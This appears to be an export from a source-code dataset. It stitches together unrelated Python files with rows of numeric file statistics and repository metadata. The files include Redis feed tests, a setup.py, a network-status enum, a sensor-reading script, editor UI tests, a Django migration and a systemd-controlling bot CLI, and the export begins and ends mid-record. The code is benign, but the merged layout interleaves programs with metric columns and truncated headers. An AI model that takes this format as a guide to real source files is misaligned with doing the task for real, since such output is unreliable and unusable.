rpcmock = mock.Mock()
rpcmock.get.return_value = {'error': None, 'result': 'OK'}
chassis.send_rpc.return_value = rpcmock
b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)
inputs = ['a', 'b', 'c']
output = False
b.connect(inputs, output)
b.mgmtbus_reset()
b.start()
time.sleep(1)
SR = redis.StrictRedis()
b.filtered_update('a', indicator='testi', value={'test': 'v'})
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 1)
self.assertIn('testi', sm)
sm = SR.hlen(FTNAME+'.value')
self.assertEqual(sm, 1)
b.filtered_withdraw('a', indicator='testi')
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 0)
sm = SR.hlen(FTNAME+'.value')
self.assertEqual(sm, 0)
b.stop()
self.assertNotEqual(b.SR, None)
def test_store_value_overflow(self):
config = {'store_value': True}
chassis = mock.Mock()
chassis.request_sub_channel.return_value = None
ochannel = mock.Mock()
chassis.request_pub_channel.return_value = ochannel
chassis.request_rpc_channel.return_value = None
rpcmock = mock.Mock()
rpcmock.get.return_value = {'error': None, 'result': 'OK'}
chassis.send_rpc.return_value = rpcmock
b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)
b.max_entries = 1
inputs = ['a', 'b', 'c']
output = False
b.connect(inputs, output)
b.mgmtbus_reset()
b.start()
time.sleep(1)
SR = redis.StrictRedis()
b.filtered_update('a', indicator='testi', value={'test': 'v'})
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 1)
self.assertIn('testi', sm)
sm = SR.hlen(FTNAME+'.value')
self.assertEqual(sm, 1)
b.filtered_update('a', indicator='testio', value={'test': 'v'})
self.assertEqual(b.statistics['drop.overflow'], 1)
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 1)
self.assertIn('testi', sm)
sm = SR.hlen(FTNAME+'.value')
self.assertEqual(sm, 1)
b.filtered_withdraw('a', indicator='testi')
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 0)
sm = SR.hlen(FTNAME+'.value')
self.assertEqual(sm, 0)
b.filtered_update('a', indicator='testio', value={'test': 'v'})
self.assertEqual(b.statistics['drop.overflow'], 1)
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 1)
self.assertIn('testio', sm)
sm = SR.hlen(FTNAME+'.value')
self.assertEqual(sm, 1)
b.stop()
self.assertNotEqual(b.SR, None)
| 29.714286 | 75 | 0.585366 | 1,009 | 8,528 | 4.835481 | 0.177403 | 0.101455 | 0.04919 | 0.045091 | 0.744005 | 0.695224 | 0.675548 | 0.659766 | 0.624513 | 0.608321 | 0 | 0.010475 | 0.283537 | 8,528 | 286 | 76 | 29.818182 | 0.788052 | 0.072702 | 0 | 0.710145 | 0 | 0 | 0.055267 | 0 | 0 | 0 | 0 | 0 | 0.227053 | 1 | 0.038647 | false | 0.004831 | 0.028986 | 0 | 0.072464 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94c6f00f1e90e2bb704b2f6875335a7a2ff04502 | 871 | py | Python | setup.py | carlmontanari/sea_nwautomation_meetup_oct_2019 | 98da0fd40e1ba5733f79ef1f2e14276bbf439f00 | [
"MIT"
] | 3 | 2019-11-25T06:47:43.000Z | 2021-05-29T13:27:06.000Z | setup.py | carlmontanari/sea_nwautomation_meetup_oct_2019 | 98da0fd40e1ba5733f79ef1f2e14276bbf439f00 | [
"MIT"
] | null | null | null | setup.py | carlmontanari/sea_nwautomation_meetup_oct_2019 | 98da0fd40e1ba5733f79ef1f2e14276bbf439f00 | [
"MIT"
] | 2 | 2020-03-11T07:21:19.000Z | 2021-05-29T13:27:07.000Z | #!/usr/bin/env python
import setuptools
__author__ = "Carl Montanari"
with open("README.md", "r") as f:
README = f.read()
setuptools.setup(
name="sea_nwautomation_meetup_oct_2019",
version="2019.09.15",
author=__author__,
author_email="carl.r.montanari@gmail.com",
description="Check out some cool nornir stuff!",
long_description=README,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[],
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS",
],
python_requires=">=3.6",
)
| 28.096774 | 52 | 0.639495 | 98 | 871 | 5.479592 | 0.632653 | 0.141527 | 0.18622 | 0.193669 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030747 | 0.215844 | 871 | 30 | 53 | 29.033333 | 0.75549 | 0.022962 | 0 | 0 | 0 | 0 | 0.454118 | 0.068235 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94d1a5ad4a94c8f31389bab09def22acb7245f64 | 744 | py | Python | comicolorization_sr/colorization_task/base.py | DwangoMediaVillage/Comicolorization | 98f323e78baceae0b1086f01ac51b5e8a7515abb | [
"MIT"
] | 122 | 2017-08-21T10:01:07.000Z | 2022-03-21T13:52:19.000Z | comicolorization_sr/colorization_task/base.py | DwangoMediaVillage/Comicolorization | 98f323e78baceae0b1086f01ac51b5e8a7515abb | [
"MIT"
] | 7 | 2017-10-20T15:12:13.000Z | 2022-01-30T23:04:37.000Z | comicolorization_sr/colorization_task/base.py | DwangoMediaVillage/Comicolorization | 98f323e78baceae0b1086f01ac51b5e8a7515abb | [
"MIT"
] | 26 | 2017-08-22T08:11:20.000Z | 2022-03-09T14:59:18.000Z | from abc import ABCMeta, abstractmethod
import typing
import six
from comicolorization_sr.config import Config
from comicolorization_sr.data_process import BaseDataProcess
@six.add_metaclass(ABCMeta)
class BaseColorizationTask(object):
def __init__(self, config, load_model=True):
# type: (Config, any) -> None
self.config = config
self.load_model = load_model
@abstractmethod
def get_input_process(self):
# type: (any) -> BaseDataProcess
pass
@abstractmethod
def get_concat_process(self):
# type: (any) -> BaseDataProcess
pass
@abstractmethod
def get_colorizer(self):
# type: (any) -> typing.Callable[[typing.Any, bool], typing.Any]
pass
| 25.655172 | 72 | 0.682796 | 83 | 744 | 5.927711 | 0.409639 | 0.054878 | 0.121951 | 0.073171 | 0.231707 | 0.231707 | 0.231707 | 0.231707 | 0.231707 | 0 | 0 | 0 | 0.228495 | 744 | 28 | 73 | 26.571429 | 0.857143 | 0.204301 | 0 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0.157895 | 0.263158 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
94d5f7b18c2143b73996eb232caf28a1df4c4d79 | 885 | py | Python | utils/gnet.py | eigenphi/gcommon | bce1ee422874fa904d90afee03fd703a06dc7a4d | [
"MIT"
] | 3 | 2021-11-09T09:43:21.000Z | 2021-12-16T18:15:43.000Z | utils/gnet.py | eigenphi/gcommon | bce1ee422874fa904d90afee03fd703a06dc7a4d | [
"MIT"
] | null | null | null | utils/gnet.py | eigenphi/gcommon | bce1ee422874fa904d90afee03fd703a06dc7a4d | [
"MIT"
] | 2 | 2022-03-10T11:24:46.000Z | 2022-03-25T06:39:17.000Z | # -*- coding: utf-8 -*-
# created: 2015-05-12
# creator: liguopeng@liguopeng.net
"""网络相关的基础函数、基础类型"""
from enum import Enum
class ConnectionStatus(Enum):
"""所有支持的连接状态"""
Initialized = "initialized"
Connected = "connected"
Closed = "closed"
Connecting = "connecting"
Reconnecting = "reconnecting"
Suspended = "suspended"
Connection_Failed = "connection_failed"
Closing = "closing"
@property
def is_connecting(self):
return self in (self.Connecting, self.Reconnecting)
@property
def is_connected(self):
return self == self.Connected
@property
def is_closed(self):
return self in (self.Connection_Failed, self.Closed, self.Initialized)
@property
def is_closing(self):
return self == self.Closing
@property
def is_suspended(self):
return self == self.Suspended
| 21.071429 | 78 | 0.653107 | 93 | 885 | 6.129032 | 0.354839 | 0.096491 | 0.114035 | 0.094737 | 0.070175 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013314 | 0.236158 | 885 | 41 | 79 | 21.585366 | 0.829882 | 0.114124 | 0 | 0.2 | 0 | 0 | 0.105058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.04 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
94d944ede215de6f719c578046e25496ee9261fd | 253 | py | Python | ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/constantfolding/data/arithmetic/in_5_powers.py | JetBrains-Research/ast-transformations | 0ab408af3275b520cc87a473f418c4b4dfcb0284 | [
"MIT"
] | 8 | 2021-01-19T21:15:54.000Z | 2022-02-23T19:16:25.000Z | ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/constantfolding/data/arithmetic/in_5_powers.py | JetBrains-Research/ast-transformations | 0ab408af3275b520cc87a473f418c4b4dfcb0284 | [
"MIT"
] | 4 | 2020-11-17T14:28:25.000Z | 2022-02-24T07:54:28.000Z | ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/constantfolding/data/arithmetic/in_5_powers.py | nbirillo/ast-transformations | 717706765a2da29087a0de768fc851698886dd65 | [
"MIT"
] | 1 | 2022-02-23T19:16:30.000Z | 2022-02-23T19:16:30.000Z | a = 2 ** 62
b = 2 ** 63
c = 0 ** 0
d = 0 ** 1
e = 1 ** 999999999
f = 1 ** 999999999999999999999999999
g = 1 ** (-1)
h = 0 ** (-1)
i = 999999999999999 ** 99999999999999999999999999999
j = 2 ** 10
k = 10 ** 10
l = 13 ** 3
m = (-3) ** 3
n = (-3) ** 4
| 12.65 | 52 | 0.490119 | 42 | 253 | 2.952381 | 0.642857 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.617978 | 0.296443 | 253 | 19 | 53 | 13.315789 | 0.078652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94e571227135c3d7295e0cda3e437b096b12fc45 | 310 | py | Python | librariesForWeatherStation/Adafruit_Python_BMP/examples/simpltetest.py | KaushikNeelichetty/IoT-Based-Weather-Station-with-Raspberry-Pi | e3dcd55395dad750f5949ba3e9ceeee4b3428f90 | [
"MIT"
] | 3 | 2021-01-04T14:41:07.000Z | 2021-04-18T23:03:07.000Z | librariesForWeatherStation/Adafruit_Python_BMP/examples/simpltetest.py | KaushikNeelichetty/IoT-Based-Weather-Station-with-Raspberry-Pi | e3dcd55395dad750f5949ba3e9ceeee4b3428f90 | [
"MIT"
] | null | null | null | librariesForWeatherStation/Adafruit_Python_BMP/examples/simpltetest.py | KaushikNeelichetty/IoT-Based-Weather-Station-with-Raspberry-Pi | e3dcd55395dad750f5949ba3e9ceeee4b3428f90 | [
"MIT"
] | 3 | 2020-05-21T02:34:15.000Z | 2022-03-31T21:20:21.000Z | import Adafruit_BMP.BMP085 as BMP085
sensor = BMP085.BMP085()
temp = '{0:0.2f}'.format(sensor.read_temperature())
pressure = '{0:0.2f}'.format(sensor.read_pressure())
altitude = '{0:0.2f}'.format(sensor.read_altitude())
seaalevelPressure = '{0:0.2f}'.format(sensor.read_sealevel_pressure())
print(type(temp))
| 34.444444 | 70 | 0.735484 | 45 | 310 | 4.933333 | 0.4 | 0.036036 | 0.072072 | 0.18018 | 0.36036 | 0.36036 | 0 | 0 | 0 | 0 | 0 | 0.083045 | 0.067742 | 310 | 8 | 71 | 38.75 | 0.685121 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94edf543cfb5d538c3d8441a1ed86778f9f7c850 | 7,643 | py | Python | app/unit_test_ui.py | cclauss/ci_edit | 5af80d643e7b16e5e3270771bdbc6b322255d460 | [
"Apache-2.0"
] | null | null | null | app/unit_test_ui.py | cclauss/ci_edit | 5af80d643e7b16e5e3270771bdbc6b322255d460 | [
"Apache-2.0"
] | null | null | null | app/unit_test_ui.py | cclauss/ci_edit | 5af80d643e7b16e5e3270771bdbc6b322255d460 | [
"Apache-2.0"
] | null | null | null | # -*- coding: latin-1 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import curses
import os
import sys
from app.curses_util import *
import app.ci_program
import app.fake_curses_testing
import app.prefs
kTestFile = u'#application_test_file_with_unlikely_file_name~'
class UiBasicsTestCases(app.fake_curses_testing.FakeCursesTestCase):
def setUp(self):
self.longMessage = True
if True:
# The buffer manager will retain the test file in RAM. Reset it.
try:
del sys.modules['app.buffer_manager']
import app.buffer_manager
except KeyError:
pass
if os.path.isfile(kTestFile):
os.unlink(kTestFile)
self.assertFalse(os.path.isfile(kTestFile))
app.fake_curses_testing.FakeCursesTestCase.setUp(self)
def test_logo(self):
self.runWithTestFile(kTestFile, [
#self.assertEqual(256, app.prefs.startup['numColors']),
self.displayCheck(0, 0, [u" ci "]),
self.displayCheckStyle(0, 0, 1, len(" ci "), app.prefs.color['logo']),
CTRL_Q])
def test_whole_screen(self):
#self.setMovieMode(True)
self.runWithTestFile(kTestFile, [
self.displayCheck(0, 0, [
u" ci . ",
u" ",
u" 1 ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u"New buffer | 1, 1 | 0%, 0%",
u" ",
]), CTRL_Q])
def test_resize_screen(self):
self.runWithTestFile(kTestFile, [
self.displayCheck(0, 0, [
u" ci . ",
u" ",
u" 1 ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u"New buffer | 1, 1 | 0%, 0%",
u" ",
]),
self.resizeScreen(10, 36),
self.displayCheck(0, 0, [
u" ci . ",
u" ",
u" 1 ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" 1, 1 | 0%, 0%",
u" ",
]),
CTRL_Q])
def test_prediction(self):
#self.setMovieMode(True)
self.runWithTestFile(kTestFile, [
self.displayCheck(-1, 0, [u" "]),
#CTRL_P, self.displayCheck(-1, 0, ["p: "]), CTRL_J,
self.displayCheck(-1, 0, [u" "]),
#CTRL_P, self.displayCheck(-1, 0, ["p: "]), CTRL_J,
CTRL_Q])
def test_text_contents(self):
self.runWithTestFile(kTestFile, [
self.displayCheck(2, 7, [u" "]), u't', u'e', u'x', u't',
self.displayCheck(2, 7, [u"text "]), CTRL_Q, u'n'])
def test_session(self):
self.runWithTestFile(kTestFile, [
self.displayCheck(0, 0, [
u" ci . ",
u" ",
u" 1 ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u"New buffer | 1, 1 | 0%, 0%",
u" "]),
u'H', u'e', u'l', u'l', u'o',
self.displayCheck(0, 0, [
u" ci * ",
u" ",
u" 1 Hello ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" 1, 6 | 0%,100%",
u" "]),
CTRL_Z,
self.displayCheck(0, 0, [
u" ci . ",
u" ",
u" 1 ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" ",
u" 1, 1 | 0%, 0%",
u" "]),
CTRL_Q])
| 42.938202 | 78 | 0.262201 | 505 | 7,643 | 3.869307 | 0.30099 | 0.064483 | 0.07523 | 0.088025 | 0.385875 | 0.317298 | 0.281986 | 0.281986 | 0.281986 | 0.221085 | 0 | 0.029024 | 0.652885 | 7,643 | 177 | 79 | 43.180791 | 0.707501 | 0.10925 | 0 | 0.713287 | 0 | 0 | 0.511566 | 0.006925 | 0 | 0 | 0 | 0 | 0.006993 | 1 | 0.048951 | false | 0.006993 | 0.076923 | 0 | 0.132867 | 0.006993 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94f729a1144cc5dd93cf60e93b0a3fdad3d0e094 | 144 | py | Python | backend_rest/users/choices.py | ezrankayamba/twiga_expodocs | 39303f137f3761e7024e1e0e1a6449f4187e30e9 | [
"MIT"
] | null | null | null | backend_rest/users/choices.py | ezrankayamba/twiga_expodocs | 39303f137f3761e7024e1e0e1a6449f4187e30e9 | [
"MIT"
] | 13 | 2020-02-21T13:58:18.000Z | 2022-03-12T00:16:26.000Z | backend_rest/users/choices.py | ezrankayamba/twiga_expodocs | 39303f137f3761e7024e1e0e1a6449f4187e30e9 | [
"MIT"
] | null | null | null | PRIVILEGE_CHOICES = [
('Users.manageUser', 'Manage Users'),
('Sales.manage', 'Manage Sales'),
('Sales.docs', 'Manage Documents'),
]
| 24 | 41 | 0.618056 | 14 | 144 | 6.285714 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173611 | 144 | 5 | 42 | 28.8 | 0.739496 | 0 | 0 | 0 | 0 | 0 | 0.541667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94f73fe49b60fa653297683ac3a27ea41b414c2a | 63 | py | Python | python/debugging/__init__.py | mxdzi/hackerrank | 4455f73e4479a4204b2e1167253f6a02351aa5b7 | [
"MIT"
] | null | null | null | python/debugging/__init__.py | mxdzi/hackerrank | 4455f73e4479a4204b2e1167253f6a02351aa5b7 | [
"MIT"
] | null | null | null | python/debugging/__init__.py | mxdzi/hackerrank | 4455f73e4479a4204b2e1167253f6a02351aa5b7 | [
"MIT"
] | null | null | null | __all__ = [
'q1_words_score',
'q2_default_arguments'
]
| 12.6 | 26 | 0.650794 | 7 | 63 | 4.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040816 | 0.222222 | 63 | 4 | 27 | 15.75 | 0.632653 | 0 | 0 | 0 | 0 | 0 | 0.539683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a2069eb52e37dfa86efa3244c3eed7f14c22db1c | 1,012 | py | Python | bot/setupbot.py | iorenml/tiktok_bot | 84a316c4d28b2803fd747b1e6aafe20c4f0c4f58 | [
"MIT"
] | null | null | null | bot/setupbot.py | iorenml/tiktok_bot | 84a316c4d28b2803fd747b1e6aafe20c4f0c4f58 | [
"MIT"
] | null | null | null | bot/setupbot.py | iorenml/tiktok_bot | 84a316c4d28b2803fd747b1e6aafe20c4f0c4f58 | [
"MIT"
] | null | null | null | #!/usr/bin/python3.9
import os
import shutil
import click
@click.group()
def cli_start():
pass
@cli_start.command()
def start():
# создание нового сервиса
shutil.copy("/usr/local/bin/ttbot/ttbot.service",
"/etc/systemd/system/ttbot.service")
# включение сервиса
os.system('systemctl daemon-reload')
os.system('systemctl enable ttbot')
os.system('systemctl start ttbot')
click.echo('Бот ВКЛючен')
@click.group()
def cli_stop():
pass
@cli_stop.command()
def stop():
# выключение
os.system('systemctl disable ttbot')
os.system('systemctl stop ttbot')
click.echo('Бот ВЫКЛючен')
@click.group()
def cli_status():
pass
@cli_status.command()
def status():
os.system('systemctl status ttbot')
@click.group()
def cli_info():
pass
@cli_info.command()
def info():
click.echo('Скрипт работает')
test = click.CommandCollection(sources=[cli_start, cli_stop, cli_status, cli_info])
if __name__ == '__main__':
test()
| 15.569231 | 83 | 0.666008 | 131 | 1,012 | 4.992366 | 0.351145 | 0.073395 | 0.155963 | 0.097859 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002436 | 0.188735 | 1,012 | 64 | 84 | 15.8125 | 0.794153 | 0.071146 | 0 | 0.216216 | 0 | 0 | 0.260684 | 0.071581 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0.108108 | 0.081081 | 0 | 0.297297 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
a211fe2950cb229c71949f12d1c4a23b8e6e92fc | 1,667 | py | Python | ana/piecewise2.py | hanswenzel/opticks | b75b5929b6cf36a5eedeffb3031af2920f75f9f0 | [
"Apache-2.0"
] | 11 | 2020-07-05T02:39:32.000Z | 2022-03-20T18:52:44.000Z | ana/piecewise2.py | hanswenzel/opticks | b75b5929b6cf36a5eedeffb3031af2920f75f9f0 | [
"Apache-2.0"
] | null | null | null | ana/piecewise2.py | hanswenzel/opticks | b75b5929b6cf36a5eedeffb3031af2920f75f9f0 | [
"Apache-2.0"
] | 4 | 2020-09-03T20:36:32.000Z | 2022-01-19T07:42:21.000Z | #!/usr/bin/env python
"""
Hmm maybe its impossible to get anywhere with integral without first fixing the BetaInverse
In [22]: pw.subs(b, 1.55)
Out[22]: Piecewise((Max(0, 0.542862145685886*e - 3.9544951109741), (e > 7.294) & (e < 7.75)), (0, True))
In [23]: pw.subs(b, 1.)
Out[23]: Piecewise((Max(0, 0.225957188630962*e - 1.06222481205998), (e > 7.294) & (e < 7.75)), (0, True))
"""
import numpy as np
import sympy as sym
ri = np.array([
[ 1.55 , 1.478],
[ 1.795, 1.48 ],
[ 2.105, 1.484],
[ 2.271, 1.486],
[ 2.551, 1.492],
[ 2.845, 1.496],
[ 3.064, 1.499],
[ 4.133, 1.526],
[ 6.2 , 1.619],
[ 6.526, 1.618],
[ 6.889, 1.527],
[ 7.294, 1.554],
[ 7.75 , 1.793],
[ 8.267, 1.783],
[ 8.857, 1.664],
[ 9.538, 1.554],
[10.33 , 1.454],
[15.5 , 1.454]
])
if __name__ == '__main__':
e, b = sym.symbols("e b")
i = 11
e0, r0 = ri[i]
e1, r1 = ri[i+1]
em = (e0 + e1)/2.
v0 = ( 1 - b/r0 ) * ( 1 + b/r0 )
v1 = ( 1 - b/r1 ) * ( 1 + b/r1 )
fr = (e-e0)/(e1-e0)
pt = ( sym.Max(v0*(1-fr) + v1*fr,0), (e > e0) & (e < e1) )
ot = (0, True )
pw = sym.Piecewise( pt, ot )
v = pw.subs(b, 1.55).subs(e, em)
print(v)
| 24.514706 | 193 | 0.34973 | 225 | 1,667 | 2.555556 | 0.453333 | 0.013913 | 0.036522 | 0.041739 | 0.083478 | 0.048696 | 0.048696 | 0.048696 | 0 | 0 | 0 | 0.298746 | 0.473905 | 1,667 | 67 | 194 | 24.880597 | 0.356899 | 0.428314 | 0 | 0 | 0 | 0 | 0.011715 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.055556 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a217ee46e4f42794bce4b2ee9426a900a6fb52db | 2,144 | py | Python | blog/migrations/0029_auto_20210114_1514.py | SaeedTJF/FaraPy-1 | 31fbfd1ec10fd78a167ddc476ace7ed5eceee538 | [
"BSD-3-Clause"
] | 1 | 2021-06-09T08:02:05.000Z | 2021-06-09T08:02:05.000Z | blog/migrations/0029_auto_20210114_1514.py | SaeedTJF/FaraPy-1 | 31fbfd1ec10fd78a167ddc476ace7ed5eceee538 | [
"BSD-3-Clause"
] | null | null | null | blog/migrations/0029_auto_20210114_1514.py | SaeedTJF/FaraPy-1 | 31fbfd1ec10fd78a167ddc476ace7ed5eceee538 | [
"BSD-3-Clause"
] | 1 | 2021-06-03T17:40:59.000Z | 2021-06-03T17:40:59.000Z | # Generated by Django 3.0.3 on 2021-01-14 11:44
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0028_auto_20210114_1449'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='status',
field=models.IntegerField(choices=[(1, 'Confirmed'), (0, 'Not confirmed')], default=0, verbose_name='Status'),
),
migrations.AlterField(
model_name='menu',
name='status',
field=models.IntegerField(choices=[(1, 'Secondry Menu'), (0, 'Primary Menu')], default=0, verbose_name='Status'),
),
migrations.AlterField(
model_name='portable',
name='sex',
field=models.IntegerField(choices=[(0, 'Female'), (1, 'Male')], default=1, verbose_name='Sex'),
),
migrations.AlterField(
model_name='submenu',
name='status',
field=models.IntegerField(choices=[(0, 'Category'), (2, 'Page'), (1, 'Address')], default=0, verbose_name='Status'),
),
migrations.AlterField(
model_name='task_manegar',
name='created_time',
field=models.DateField(default=datetime.datetime(2021, 1, 14, 15, 14, 50, 776080), null=True, verbose_name='Start date'),
),
migrations.AlterField(
model_name='task_manegar',
name='end_time',
field=models.DateField(default=datetime.datetime(2021, 1, 14, 15, 14, 50, 776080), null=True, verbose_name='Finish date'),
),
migrations.AlterField(
model_name='task_manegar',
name='status',
field=models.IntegerField(choices=[(3, 'Done!'), (0, 'To Do'), (1, 'In progress')], default=0, verbose_name='Status'),
),
migrations.AlterField(
model_name='time',
name='status',
field=models.IntegerField(choices=[(1, 'Out of Duty'), (0, 'On Duty')], default=0, verbose_name='Status'),
),
]
| 38.981818 | 135 | 0.555504 | 220 | 2,144 | 5.304545 | 0.331818 | 0.08569 | 0.17138 | 0.1988 | 0.645244 | 0.596401 | 0.531277 | 0.413025 | 0.330763 | 0.145673 | 0 | 0.05863 | 0.291978 | 2,144 | 54 | 136 | 39.703704 | 0.710145 | 0.020989 | 0 | 0.5 | 1 | 0 | 0.154185 | 0.011258 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bf44d919e3e12ebd163751757b1927b22effdb5b | 336 | py | Python | Session3-Conditional-Statements-part2/01_day_of_week.py | elenaborisova/Crack-the-Code | d0b505ebad878d5228d98c934779ed9b28f6c034 | [
"MIT"
] | null | null | null | Session3-Conditional-Statements-part2/01_day_of_week.py | elenaborisova/Crack-the-Code | d0b505ebad878d5228d98c934779ed9b28f6c034 | [
"MIT"
] | null | null | null | Session3-Conditional-Statements-part2/01_day_of_week.py | elenaborisova/Crack-the-Code | d0b505ebad878d5228d98c934779ed9b28f6c034 | [
"MIT"
